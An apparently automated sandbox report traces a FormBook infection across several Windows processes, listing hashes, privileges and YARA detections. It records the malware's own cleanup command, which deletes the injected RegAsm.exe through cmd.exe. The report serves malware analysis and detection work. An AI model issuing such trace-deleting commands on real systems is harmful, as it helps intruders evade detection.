                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2137321708.0000000005271000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Antivirus matches:
                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                • Detection: 27%, ReversingLabs
                                                                                                                                                                Reputation:low

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:03
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                                                                                Imagebase:0x1080000
                                                                                                                                                                File size:64672 bytes
                                                                                                                                                                MD5 hash:ADF76F395D5A0ECBBF005390B73C3FD2
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170015220.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2169931464.00000000001B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.2170113798.0000000000990000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:05
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\explorer.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:
                                                                                                                                                                Imagebase:0xffca0000
                                                                                                                                                                File size:3229696 bytes
                                                                                                                                                                MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:16
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                Imagebase:0x1e0000
                                                                                                                                                                File size:44544 bytes
                                                                                                                                                                MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Yara matches:
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347273869.0000000000230000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347301832.0000000000260000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2347163126.00000000000D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                                Reputation:moderate

                                                                                                                                                                General

                                                                                                                                                                Start time:12:05:20
                                                                                                                                                                Start date:20/11/2020
                                                                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
                                                                                                                                                                Imagebase:0x4aaf0000
                                                                                                                                                                File size:302592 bytes
                                                                                                                                                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Reputation:high

                                                                                                                                                                Disassembly

                                                                                                                                                                Code Analysis

                                                                                                                                                                Reset < >